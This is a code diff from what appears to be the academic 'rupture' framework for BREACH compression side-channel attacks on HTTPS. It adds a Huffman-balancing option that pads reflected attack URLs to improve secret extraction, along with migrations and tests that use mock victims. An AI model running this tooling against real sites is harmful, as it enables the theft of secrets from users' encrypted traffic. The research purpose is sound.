decrypto-org · dimkarakostas · Dec 15, 2017 · Dec 15, 2017 · Dec 15, 2017 · Dec 15, 2017
diff --git a/backend/breach/migrations/0028_auto_20171215_1248.py b/backend/breach/migrations/0028_auto_20171215_1248.py
@@ -0,0 +1,30 @@
+# -*- coding: utf-8 -*-
+# Generated by Django 1.9.2 on 2017-12-15 12:48
+from __future__ import unicode_literals
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ('breach', '0027_auto_20171210_1343'),
+    ]
+
+    operations = [
+        migrations.AddField(
+            model_name='round',
+            name='huffman_balance',
+            field=models.BooleanField(default=True, help_text='Whether to use huffman balance for match symbols.'),
+        ),
+        migrations.AddField(
+            model_name='sampleset',
+            name='huffman_match_balance',
+            field=models.CharField(default='', help_text='The alphabet used for balancing the Huffman tree for the match pointers.', max_length=255),
+        ),
+        migrations.AddField(
+            model_name='target',
+            name='huffman_balance',
+            field=models.BooleanField(default=True, help_text='Whether to use huffman balance for match symbols.'),
+        ),
+    ]
diff --git a/backend/breach/models/round.py b/backend/breach/models/round.py
@@ -130,3 +130,8 @@ def fetch_per_batch_info(self):
         help_text=('Whether to use Huffman pool or not, in case '
                    'maxreflectionlength does not allow it')
     )
+
+    huffman_balance = models.BooleanField(
+        default=True,
+        help_text=('Whether to use huffman balance for match symbols.')
+    )
diff --git a/backend/breach/models/sampleset.py b/backend/breach/models/sampleset.py
@@ -93,3 +93,10 @@ def create_sampleset(params):
         help_text=('Whether the samples in this sampleset were all collected '
                    'successfully')
     )
+
+    huffman_match_balance = models.CharField(
+        max_length=255,
+        default='',
+        help_text=('The alphabet used for balancing the Huffman tree for the '
+                   'match pointers.')
+    )
diff --git a/backend/breach/models/target.py b/backend/breach/models/target.py
@@ -135,3 +135,8 @@ def host(self):
         help_text=('The amplification factor that is used for the '
                    'the backtracking execution.')
     )
+
+    huffman_balance = models.BooleanField(
+        default=True,
+        help_text=('Whether to use huffman balance for match symbols.')
+    )
diff --git a/backend/breach/strategy.py b/backend/breach/strategy.py
@@ -165,7 +165,7 @@ def _url(self, alphabet):
 
     def _sampleset_to_work(self, sampleset):
         return {
-            'url': self._url(sampleset.candidatealphabet),
+            'url': self._url(sampleset.candidatealphabet) + sampleset.huffman_match_balance,
             'amount': self._victim.target.samplesize,
             'alignmentalphabet': sampleset.alignmentalphabet,
             'timeout': 0
@@ -342,14 +342,21 @@ def _build_candidate_alphabets():
 
         def _get_first_reflection():
             alphabet = _build_candidate_alphabets()[0]
-            return self._reflection(alphabet)
+            ref = self._reflection(alphabet)
+            if self._round.huffman_balance:
+                ref += self._get_huffman_balance()
+            return ref
 
         if self._round.victim.target.maxreflectionlength == 0:
             self._set_round_cardinalities(self._build_candidates(state))
             return
 
         while len(_get_first_reflection()) > self._round.victim.target.maxreflectionlength:
-            if self._round.method == Target.DIVIDE_CONQUER:
+            if self._round.huffman_balance:
+                self._round.huffman_balance = False
+                self._round.save()
+                logger.info('Huffman balance cannot be used, removing it.')
+            elif self._round.method == Target.DIVIDE_CONQUER:
                 self._round.method = Target.SERIAL
                 self._round.save()
                 logger.info('Divide & conquer method cannot be used, falling back to serial.')
@@ -390,6 +397,7 @@ def _create_round(self, state):
             accumulated_probability=prob,
             huffman_pool=self._victim.target.huffman_pool,
             block_align=self._victim.target.block_align,
+            huffman_balance=self._victim.target.huffman_balance,
             method=self._victim.target.method
         )
         next_round.save()
@@ -410,6 +418,28 @@ def _create_round(self, state):
             self._round.delete()
             raise err
 
+    def _get_huffman_balance(self):
+        # The LZ77 algorithm runs first and the Huffman tree is produced afterwards.
+        # When the LZ77 algorithm runs, it creates "match" symbols encoding the length
+        # of the matching portion of the text, e.g., if the matching size is 5, the symbol
+        # encoded will be a "match 5". When the secret compresses well due to LZ77, the
+        # symbol encoded in the Huffman tree will be a match equal to the known secret text
+        # length plus one; when it does not compress well, it will be a match equal to
+        # only the known secret length. The changing frequencies of the match symbols
+        # occurrences can cause a snowball effect on the Huffman tree if their frequencies
+        # are close to the frequencies of other symbols (such as literals). Here, we artificially
+        # create more occurences of the "match 5" and "match 6" LZ77 symbols (for a known
+        # secret of e.g. size 5) such that we can separate them distinctly within the Huffman
+        # tree.
+
+        balance1 = ''
+        balance2 = ''
+        for i in range(len(self._round.knownsecret) + 1):
+            balance1 += random.choice(string.ascii_lowercase + string.ascii_uppercase)
+            balance2 += random.choice(string.ascii_lowercase + string.ascii_uppercase)
+        balance1 = balance1[:-1]
+        return ''.join([balance2 + balance1 + chr(ord('A') + i) for i in range(random.randrange(ord('Z') - ord('A')))])
+
     def _create_round_samplesets(self):
         state = {
             'knownalphabet': self._round.knownalphabet,
@@ -421,6 +451,10 @@ def _create_round_samplesets(self):
 
         candidate_alphabets = self._build_candidates(state)
 
+        huffman_match_balance = ''
+        if self._round.huffman_balance:
+            huffman_match_balance = self._get_huffman_balance()
+
         alignmentalphabet = ''
         if self._round.block_align:
             alignmentalphabet = list(self._round.victim.target.alignmentalphabet)
@@ -432,6 +466,7 @@ def _create_round_samplesets(self):
                 'round': self._round,
                 'candidatealphabet': candidate,
                 'alignmentalphabet': alignmentalphabet,
+                'huffman_match_balance': huffman_match_balance,
                 'batch': self._round.batch
             })
 

diff --git a/backend/breach/tests/test_strategy.py b/backend/breach/tests/test_strategy.py
@@ -70,6 +70,7 @@ def test_same_round_different_batch(self, Sniffer):
             amount=1,
             knownsecret='testsecret',
             knownalphabet='01',
+            huffman_balance=False
         )
         self.dif_batch_samplesets = [
             SampleSet.objects.create(
@@ -116,7 +117,8 @@ def test_advance_round(self, Sniffer):
             endpoint='https://di.uoa.gr/?breach=%s',
             prefix='test',
             alphabet='0123456789',
-            name='ruptureit'
+            name='ruptureit',
+            huffman_balance=False
         )
 
         next_round_victim = Victim.objects.create(
@@ -130,6 +132,7 @@ def test_advance_round(self, Sniffer):
             amount=1,
             knownsecret='testsecret',
             knownalphabet='01',
+            huffman_balance=False
         )
 
         SampleSet.objects.create(
@@ -192,7 +195,8 @@ def test_divide_and_conquer(self, Sniffer):
             prefix='test',
             alphabet='0123',
             name='webuoa',
-            method=DIVIDE_CONQUER
+            method=DIVIDE_CONQUER,
+            huffman_balance=False
         )
 
         victim = self.create_mock_victim(mock_target)
@@ -213,6 +217,29 @@ def test_divide_and_conquer(self, Sniffer):
         )
         strategy1._mark_current_work_completed()
 
+    @patch('breach.strategy.Sniffer')
+    def test_downgrade_huffman_balance(self, Sniffer):
+        target = Target.objects.create(
+            name='maxreflection',
+            endpoint='https://test.com/?breach=%s',
+            prefix='test',
+            alphabet='0123',
+            maxreflectionlength=30,
+            method=2
+        )
+
+        victim = Victim.objects.create(
+            target=target,
+            sourceip='192.168.10.141',
+            snifferendpoint='http://localhost/'
+        )
+
+        strategy = Strategy(victim)
+        work = strategy.get_work()
+        self.assertEqual(work, {'url': u'https://test.com/?breach=^3^2^test1^test0^', 'amount': 64, 'timeout': 0, 'alignmentalphabet': u''})
+
+        target.delete()
+
     @patch('breach.strategy.Sniffer')
     def test_downgrade_to_serial(self, Sniffer):
         target = Target.objects.create(
@@ -244,7 +271,8 @@ def test_downgrade_huffman(self, Sniffer):
             prefix='test',
             alphabet='0123',
             maxreflectionlength=12,
-            method=2
+            method=2,
+            huffman_balance=False
         )
 
         victim = Victim.objects.create(
@@ -267,7 +295,8 @@ def test_maxreflectionerror(self, Sniffer):
             prefix='test',
             alphabet='0123',
             maxreflectionlength=6,
-            method=2
+            method=2,
+            huffman_balance=False
         )
 
         victim = Victim.objects.create(

diff --git a/backend/populate_targets.py b/backend/populate_targets.py
@@ -49,6 +49,8 @@ def create_target(target):
         target_args['samplesize'] = target['samplesize']
     if 'confidence_threshold' in target:
         target_args['confidence_threshold'] = target['confidence_threshold']
+    if 'huffman_balance' in target:
+        target_args['huffman_balance'] = target['huffman_balance']
 
     t = Target(**target_args)
     t.save()
@@ -59,6 +61,7 @@ def create_target(target):
          \talphabet: {}
          \tsecretlength: {}
          \talignmentalphabet: {}
+         \thuffman_balance: {}
          \trecordscardinality: {}
          \tmethod: {}'''.format(
             t.name,
@@ -67,6 +70,7 @@ def create_target(target):
             t.alphabet,
             t.secretlength,
             t.alignmentalphabet,
+            t.huffman_balance,
             t.recordscardinality,
             t.method
         )